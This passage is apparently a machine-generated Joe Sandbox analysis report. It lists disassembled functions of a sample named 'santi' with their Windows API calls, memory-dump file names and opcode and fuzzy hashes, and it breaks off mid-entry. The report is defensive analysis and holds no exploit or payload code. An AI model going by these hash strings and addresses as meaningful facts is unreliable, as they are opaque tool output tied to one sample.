                                                                • Instruction Fuzzy Hash: CF618E34A40204AFDB26CF59C894FBAB7FAFF4A300F154059E9599B2A1C7B1B940CB10
                                                                Function 00321C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 00321CB4
                                                                • VariantClear.OLEAUT32(00000013), ref: 00321D26
                                                                • VariantClear.OLEAUT32(00000000), ref: 00321D81
                                                                • VariantClear.OLEAUT32(?), ref: 00321DF8
                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00321E26
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$Clear$ChangeInitType
                                                                • String ID:
                                                                • API String ID: 4136290138-0
                                                                • Opcode ID: 174ae022a9b85159e7c8ddb5c5d334cd7bcce40c090707230905f58f4e2edc4d
                                                                • Instruction ID: b7a71f6b49acf849014ec45b51d0c692297c4e535252516a5d51e9e11547f89e
                                                                • Opcode Fuzzy Hash: 174ae022a9b85159e7c8ddb5c5d334cd7bcce40c090707230905f58f4e2edc4d
                                                                • Instruction Fuzzy Hash: 155157B5A00219EFDB15CF58D880AAAB7B8FF9C314B158559ED59DB300E730EA51CFA0
                                                                Function 00340688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003406EE
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0034077D
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0034079B
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 003407E1
                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 003407FB
                                                                  • Part of subcall function 002FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0032A574,?,?,00000000,00000008), ref: 002FE675
                                                                  • Part of subcall function 002FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0032A574,?,?,00000000,00000008), ref: 002FE699
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 327935632-0
                                                                • Opcode ID: 3bbecfc55775d619aca3b588f86d672f28ec3a49921d4b2ef69b280eba12f1e4
                                                                • Instruction ID: b552e97e193946d3885afb865f1ee45c3261bdf41f194c6e937c642dd5fecf11
                                                                • Opcode Fuzzy Hash: 3bbecfc55775d619aca3b588f86d672f28ec3a49921d4b2ef69b280eba12f1e4
                                                                • Instruction Fuzzy Hash: B2516875A40209DFCB05EFA8C5809ADB7F9BF48310B558059EA16AB352DB70FD42CF81
                                                                Function 00342E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00342EEF
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00342F2E
                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00342F75
                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00342FA1
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00342FAE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                • String ID:
                                                                • API String ID: 3740051246-0
                                                                • Opcode ID: 2a224c4b1a5df6cc7298959870ecb4a710e4c53bf3387dbcf41f7260039d1175
                                                                • Instruction ID: 8a995cd01fad22617f102fde9158decd37c430e1ede5130a96c15a7af1ad6b33
                                                                • Opcode Fuzzy Hash: 2a224c4b1a5df6cc7298959870ecb4a710e4c53bf3387dbcf41f7260039d1175
                                                                • Instruction Fuzzy Hash: 0F515771218244AFD705EF65C891EABB7F8FF88304F80881DF5959B2A1DB70E919CB52
                                                                Function 0034CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 071bc075b2fbc5f6e2aef933ebe78eb179d56b3c2af5d5d5882e80bb392bc31c
                                                                • Instruction ID: 74f7a07c7da470e388f9957316649e93c1877a44169d8f3bbfa511c2bfc22d70
                                                                • Opcode Fuzzy Hash: 071bc075b2fbc5f6e2aef933ebe78eb179d56b3c2af5d5d5882e80bb392bc31c
                                                                • Instruction Fuzzy Hash: 7741E639E12104ABC752DF68CC44FA9BBA8EB0A350F155125F819AB2E1C770BD41DA50
                                                                Function 00331206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003312B4
                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003312DD
                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0033131C
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00331341
                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00331349
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1389676194-0
                                                                • Opcode ID: 437e7b59745e2dd73bbae81d20fb1781de0ef44265fecb4a8a1352668d8c5499
                                                                • Instruction ID: 8854df2671d90a37918ee6e65c916bd624cb466aaca4457ede5598295f1af46f
                                                                • Opcode Fuzzy Hash: 437e7b59745e2dd73bbae81d20fb1781de0ef44265fecb4a8a1352668d8c5499
                                                                • Instruction Fuzzy Hash: 8E410B35A10145DFCB01EF65C9919AEBBF9FF08314B148099E90AAB3A2DB31ED51DF50
                                                                Function 0031B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowRect.USER32(?,?), ref: 0031B369
                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 0031B413
                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0031B41B
                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 0031B429
                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0031B431
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessagePostSleep$RectWindow
                                                                • String ID:
                                                                • API String ID: 3382505437-0
                                                                • Opcode ID: 491c8a0eeda3663741102c8d69a73624ef9ca4e052c7b09e5b112a5701c7ced2
                                                                • Instruction ID: ee6c31f1050ca62269cb5e64cff311e24c2c67a444940ea8ad8949d343d94961
                                                                • Opcode Fuzzy Hash: 491c8a0eeda3663741102c8d69a73624ef9ca4e052c7b09e5b112a5701c7ced2
                                                                • Instruction Fuzzy Hash: 9331D171900219EBDF09CF68DD4DADEBBB9EB08315F118629F821AB1D1C7B09D64CB91
                                                                Function 0031DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0031DBD7
                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0031DBF4
                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0031DC2C
                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0031DC52
                                                                • _wcsstr.LIBCMT ref: 0031DC5C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                • String ID:
                                                                • API String ID: 3902887630-0
                                                                • Opcode ID: 5aa4040cc3553f4847edfb85d18111638c050e30eb6674899154b6e745868b18
                                                                • Instruction ID: 75a33bf6e1e0c3d0b6e64294833666b20dd6d37b0c57400136acf6457faf03da
                                                                • Opcode Fuzzy Hash: 5aa4040cc3553f4847edfb85d18111638c050e30eb6674899154b6e745868b18
                                                                • Instruction Fuzzy Hash: 43212C71604104BBE71B5F35DD49EBB7BACDF4A750F118039F909CA191EAA1DC41D6A0
                                                                Function 0031BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0031BC90
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0031BCC2
                                                                • __itow.LIBCMT ref: 0031BCDA
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0031BD00
                                                                • __itow.LIBCMT ref: 0031BD11
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$__itow
                                                                • String ID:
                                                                • API String ID: 3379773720-0
                                                                • Opcode ID: 089590038c1dab851d7db4ec090811c3fef018bb8ed016c3d551b2789f85dd7b
                                                                • Instruction ID: 172fb95cecf7c88e79be1692e4a3ae97970557ec3be4ef5353f8a296e746f3cf
                                                                • Opcode Fuzzy Hash: 089590038c1dab851d7db4ec090811c3fef018bb8ed016c3d551b2789f85dd7b
                                                                • Instruction Fuzzy Hash: 4C210831B402187BDB1AAE659C8AFDFBA6CAF5E350F400024FA05EF181DB70898587E1
                                                                Function 00326318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E50E6: _wcsncpy.LIBCMT ref: 002E50FA
                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,003260C3), ref: 00326369
                                                                • GetLastError.KERNEL32(?,?,?,003260C3), ref: 00326374
                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003260C3), ref: 00326388
                                                                • _wcsrchr.LIBCMT ref: 003263AA
                                                                  • Part of subcall function 00326318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003260C3), ref: 003263E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                • String ID:
                                                                • API String ID: 3633006590-0
                                                                • Opcode ID: 4a3d9b555183f8de5f468780c763daa94df0526dc264cb3f6d2dd971d7d365c2
                                                                • Instruction ID: da734d926e88be1a627a6515a1600a2bfb8dfc5b5f48f4b615e0795be9e44269
                                                                • Opcode Fuzzy Hash: 4a3d9b555183f8de5f468780c763daa94df0526dc264cb3f6d2dd971d7d365c2
                                                                • Instruction Fuzzy Hash: 05210835A152254ADB27EB74BC53FEA33ACAF053A0F104465F205C71E0EBA0D9808A64
                                                                Function 00338B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0033A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0033A84E
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00338BD3
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338BE2
                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00338BFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 3701255441-0
                                                                • Opcode ID: c10905bcbab237bac92b1037391b041a324ccf671fb71eb6c02b91cbfe691417
                                                                • Instruction ID: 2afe0b1209dc05967c3774deb4484196843fe79b704a329f6f7da36f77fa3562
                                                                • Opcode Fuzzy Hash: c10905bcbab237bac92b1037391b041a324ccf671fb71eb6c02b91cbfe691417
                                                                • Instruction Fuzzy Hash: FA2190317002149FCB12AF68DD85B7EB7ADAF48750F058459FA56AB2D2CBB4AC018B61
                                                                Function 00338420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindow.USER32(00000000), ref: 00338441
                                                                • GetForegroundWindow.USER32 ref: 00338458
                                                                • GetDC.USER32(00000000), ref: 00338494
                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 003384A0
                                                                • ReleaseDC.USER32(00000000,00000003), ref: 003384DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ForegroundPixelRelease
                                                                • String ID:
                                                                • API String ID: 4156661090-0
                                                                • Opcode ID: d9d9241c56020d998febb5ed36fcb1f73db11d8c20b453ce01edd7f071f282c2
                                                                • Instruction ID: 66cafbb7e520b546545169d6bdb994f7705c1f78dcf32582dc299f5a2d9c04e5
                                                                • Opcode Fuzzy Hash: d9d9241c56020d998febb5ed36fcb1f73db11d8c20b453ce01edd7f071f282c2
                                                                • Instruction Fuzzy Hash: 04219F35A00204AFD701DFA5DC85AAEBBE9EF49301F04C479E94A9B651CB70AC00CB60
                                                                Function 002FAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002FAFE3
                                                                • SelectObject.GDI32(?,00000000), ref: 002FAFF2
                                                                • BeginPath.GDI32(?), ref: 002FB009
                                                                • SelectObject.GDI32(?,00000000), ref: 002FB033
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                • String ID:
                                                                • API String ID: 3225163088-0
                                                                • Opcode ID: 3c6cd76e17f9af2a5a12898b27e68e67077308c9a8cf5569aceca09878bbaa7c
                                                                • Instruction ID: 1f13c5344d89fb7037128a2b8789660646c1a3b744807da7b34477acbf99fc6c
                                                                • Opcode Fuzzy Hash: 3c6cd76e17f9af2a5a12898b27e68e67077308c9a8cf5569aceca09878bbaa7c
                                                                • Instruction Fuzzy Hash: 4121A1B4910209EFDB239F55EC44BAABB6CB712395F18432AF925D61F0C7B04965CF90
                                                                Function 0030217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __calloc_crt.LIBCMT ref: 003021A9
                                                                • CreateThread.KERNEL32(?,?,003022DF,00000000,?,?), ref: 003021ED
                                                                • GetLastError.KERNEL32 ref: 003021F7
                                                                • _free.LIBCMT ref: 00302200
                                                                • __dosmaperr.LIBCMT ref: 0030220B
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                • String ID:
                                                                • API String ID: 2664167353-0
                                                                • Opcode ID: 6d2b5f029f5cccd9a22ea9a652d7609de60ed3eed02b88b5fd18c95e45b3f8ab
                                                                • Instruction ID: b8e792f83e6e79e25c443db571f0b861fb937b868c523556d6f9dbf51609d242
                                                                • Opcode Fuzzy Hash: 6d2b5f029f5cccd9a22ea9a652d7609de60ed3eed02b88b5fd18c95e45b3f8ab
                                                                • Instruction Fuzzy Hash: 90112633606346AFEB17AFA9DC56DAB3B9CEF04770B110429F918CA1C1EB71D81187A0
                                                                Function 0031ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0031ABD7
                                                                • GetLastError.KERNEL32(?,0031A69F,?,?,?), ref: 0031ABE1
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,0031A69F,?,?,?), ref: 0031ABF0
                                                                • HeapAlloc.KERNEL32(00000000,?,0031A69F,?,?,?), ref: 0031ABF7
                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0031AC0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 842720411-0
                                                                • Opcode ID: 68ad9ee6a0a4c29b70aa9c1e6087a822a338b0fd9944fdd9c929f9c22ee95bf3
                                                                • Instruction ID: 0d59d994e4898e298551d231e13edcbcb8e1a74fa07cdb7dd3265f14a02c7610
                                                                • Opcode Fuzzy Hash: 68ad9ee6a0a4c29b70aa9c1e6087a822a338b0fd9944fdd9c929f9c22ee95bf3
                                                                • Instruction Fuzzy Hash: 0A018C70701205BFDB164FAADC48DAB3BACEF8A355B114429F806C3260DAB1CC90CBA0
                                                                Function 00327A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327A74
                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00327A82
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00327A8A
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00327A94
                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                • String ID:
                                                                • API String ID: 2833360925-0
                                                                • Opcode ID: b27e34f6079b932466671dcce25b1315a324dbb948f60960b1d98114068d8018
                                                                • Instruction ID: 096ca87aaaf527860eeee2bdd70c46c8ef60fc1968355ebe2f84ebe1f6f422c9
